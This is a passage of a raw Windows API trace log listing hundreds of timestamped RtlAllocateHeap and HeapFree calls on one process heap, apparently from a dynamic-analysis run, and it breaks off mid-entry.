RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29a8a30 [0218.991] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29bbc40 [0218.992] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29cee50 [0218.992] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29e2060 [0218.992] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29f5270 [0218.993] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a08480 [0218.993] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a1b690 [0218.994] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a2e8a0 [0218.994] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a41ab0 [0218.994] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a54cc0 [0218.994] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a67ed0 [0218.995] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a7b0e0 [0218.995] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a8e2f0 [0218.995] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2aa1500 [0218.996] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ab4710 [0218.996] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ac7920 [0218.997] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2adab30 [0218.997] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2aedd40 [0218.998] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b00f50 [0218.998] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b14160 [0218.999] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b27370 [0218.999] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b3a580 [0219.000] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b4d790 [0219.000] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b609a0 [0219.001] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b73bb0 [0219.001] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b86dc0 [0219.002] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b99fd0 [0219.002] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bad1e0 [0219.003] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bc03f0 [0219.004] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bd3600 [0219.004] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2be6810 [0219.005] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bf9a20 [0219.005] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c0cc30 [0219.005] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c1fe40 [0219.006] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c33050 [0219.006] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c46260 [0219.007] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c59470 [0219.007] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c6c680 [0219.008] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c7f890 [0219.008] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c92aa0 [0219.009] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ca5cb0 [0219.009] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cb8ec0 [0219.010] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ccc0d0 [0219.010] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cdf2e0 [0219.011] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cf24f0 [0219.012] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d05700 [0219.012] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d18910 [0219.012] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d40080 [0219.015] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d53290 [0219.015] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d664a0 [0219.016] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d796b0 [0219.303] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d8c8c0 [0219.304] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d9fad0 [0219.304] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9e0) returned 0x45cc90 [0219.304] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448f10 | out: hHeap=0x430000) returned 1 [0219.304] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2db2ce0 [0219.305] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2dc5ef0 [0219.306] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2dd9100 [0219.306] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2dec310 [0219.307] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2dff520 [0219.307] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e12730 [0219.308] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e25940 [0219.308] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e38b50 [0219.309] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e4bd60 [0219.309] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e5ef70 [0219.310] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e72180 [0219.311] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e85390 [0219.311] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e985a0 [0219.312] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2eab7b0 [0219.313] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ebe9c0 [0219.313] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ed1bd0 [0219.313] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ee4de0 [0219.314] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ef7ff0 [0219.315] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f0b200 [0219.315] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f1e410 [0219.316] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f31620 [0219.316] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f44830 [0219.316] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f57a40 [0219.317] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f6ac50 [0219.317] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f7de60 [0219.318] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f91070 [0219.318] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2fa4280 [0219.319] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2fb7490 [0219.320] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2fca6a0 [0219.320] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2fdd8b0 [0219.321] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ff0ac0 [0219.321] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3003cd0 [0219.322] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3016ee0 [0219.322] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x302a0f0 [0219.323] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x303d300 [0219.323] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3050510 [0219.324] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3063720 [0219.325] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3076930 [0219.325] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3089b40 [0219.325] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x309cd50 [0219.326] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x30aff60 [0219.326] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x30c3170 [0219.327] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x30d6380 [0219.327] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x30e9590 [0219.328] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x30fc7a0 [0219.328] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x310f9b0 [0219.329] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3122bc0 [0219.329] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3135dd0 [0219.330] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3148fe0 [0219.330] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x315c1f0 [0219.331] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x316f400 [0219.331] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3182610 [0219.332] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3195820 [0219.333] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x31a8a30 [0219.333] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x31bbc40 [0219.334] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x31cee50 [0219.334] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x31e2060 [0219.335] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x31f5270 [0219.335] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3208480 [0219.336] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x321b690 [0219.337] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x322e8a0 [0219.337] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3241ab0 [0219.337] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3254cc0 [0219.338] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3267ed0 [0219.338] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x327b0e0 [0219.632] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x328e2f0 [0219.633] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x32a1500 [0219.633] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x32b4710 [0219.633] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x32c7920 [0219.634] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x32dab30 [0219.634] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x32edd40 [0219.635] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3300f50 [0219.635] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3314160 [0219.636] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3327370 [0219.636] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x333a580 [0219.637] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x334d790 [0219.637] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x33609a0 [0219.637] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3373bb0 [0219.638] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3386dc0 [0219.638] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x3399fd0 [0219.639] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x33ad1e0 [0219.639] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x33c03f0 [0219.640] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x33d3600 [0219.640] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x33e6810 [0219.641] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x33f9a20 [0219.648] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45cc90 | out: hHeap=0x430000) returned 1 [0231.872] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x467b20 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x487920 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x49ab30 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4add40 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4c0f50 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4d4160 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4e7370 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4fa580 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x50d790 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e10080 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e23290 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e364a0 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e496b0 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e5c8c0 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e6fad0 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e82ce0 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e95ef0 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ea9100 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ebc310 | out: hHeap=0x430000) returned 1 [0231.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ecf520 | out: hHeap=0x430000) returned 1 [0231.874] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ee2730 | out: hHeap=0x430000) returned 1 [0231.874] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1f40080 | out: hHeap=0x430000) returned 1 [0231.874] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1f53290 | out: hHeap=0x430000) returned 1 [0231.874] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1f664a0 | out: hHeap=0x430000) returned 1 [0231.874] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1f796b0 | out: hHeap=0x430000) returned 1 [0231.874] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1f8c8c0 | out: hHeap=0x430000) returned 1 [0231.887] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1f9fad0 | out: hHeap=0x430000) returned 1 [0231.888] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1fb2ce0 | out: hHeap=0x430000) returned 1 [0231.888] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1fc5ef0 | out: hHeap=0x430000) returned 1 [0231.888] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1fd9100 | out: hHeap=0x430000) returned 1 [0231.888] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1fec310 | out: hHeap=0x430000) returned 1 [0231.888] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1fff520 | out: hHeap=0x430000) returned 1 [0231.888] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2012730 | out: hHeap=0x430000) returned 1 [0231.888] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2025940 | out: hHeap=0x430000) returned 1 [0231.888] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2038b50 | out: hHeap=0x430000) returned 1 [0231.894] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x204bd60 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x205ef70 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2072180 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2085390 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20985a0 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20ab7b0 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20be9c0 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20d1bd0 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20e4de0 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20f7ff0 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x210b200 | out: hHeap=0x430000) returned 1 [0232.122] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x211e410 | out: hHeap=0x430000) returned 1 [0232.123] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2140080 | out: hHeap=0x430000) returned 1 [0232.123] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2153290 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21664a0 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21796b0 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x218c8c0 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x219fad0 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21b2ce0 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21c5ef0 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21d9100 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21ec310 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21ff520 | out: hHeap=0x430000) returned 1 [0232.128] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2212730 | out: hHeap=0x430000) returned 1 [0232.129] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2225940 | out: hHeap=0x430000) returned 1 [0232.129] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2238b50 | out: hHeap=0x430000) returned 1 [0232.133] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x224bd60 | out: hHeap=0x430000) returned 1 [0232.133] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x225ef70 | out: hHeap=0x430000) returned 1 [0232.133] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2272180 | out: hHeap=0x430000) returned 1 [0232.134] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2285390 | out: hHeap=0x430000) returned 1 [0232.134] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22985a0 | out: hHeap=0x430000) returned 1 [0232.134] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22ab7b0 | out: hHeap=0x430000) returned 1 [0232.134] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22be9c0 | out: hHeap=0x430000) returned 1 [0232.134] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22d1bd0 | out: hHeap=0x430000) returned 1 [0232.134] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22e4de0 | out: hHeap=0x430000) returned 1 [0232.134] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22f7ff0 | out: hHeap=0x430000) returned 1 [0232.137] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x230b200 | out: hHeap=0x430000) returned 1 [0232.139] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x231e410 | out: hHeap=0x430000) returned 1 [0232.139] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2331620 | out: hHeap=0x430000) returned 1 [0232.139] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2344830 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2357a40 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x236ac50 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x237de60 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2391070 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23a4280 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23b7490 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23ca6a0 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23dd8b0 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23f0ac0 | out: hHeap=0x430000) returned 1 [0232.142] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2403cd0 | out: hHeap=0x430000) returned 1 [0232.143] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2416ee0 | out: hHeap=0x430000) returned 1 [0232.143] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x242a0f0 | out: hHeap=0x430000) returned 1 [0232.143] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x243d300 | out: hHeap=0x430000) returned 1 [0232.143] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2450510 | out: hHeap=0x430000) returned 1 [0232.147] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2463720 | out: hHeap=0x430000) returned 1 [0232.147] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2476930 | out: hHeap=0x430000) returned 1 [0232.147] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2489b40 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x249cd50 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24aff60 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24c3170 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24d6380 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24e9590 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x24fc7a0 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x250f9b0 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2522bc0 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2540080 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2553290 | out: hHeap=0x430000) returned 1 [0232.148] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25664a0 | out: hHeap=0x430000) returned 1 [0232.149] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25796b0 | out: hHeap=0x430000) returned 1 [0232.149] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x258c8c0 | out: hHeap=0x430000) returned 1 [0232.149] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x259fad0 | out: hHeap=0x430000) returned 1 [0232.149] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25b2ce0 | out: hHeap=0x430000) returned 1 [0232.149] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25c5ef0 | out: hHeap=0x430000) returned 1 [0232.149] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25d9100 | out: hHeap=0x430000) returned 1 [0232.149] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x25ec310 | out: hHeap=0x430000) returned 1 [0232.225] HeapFree (in: hHeap=0x430000, 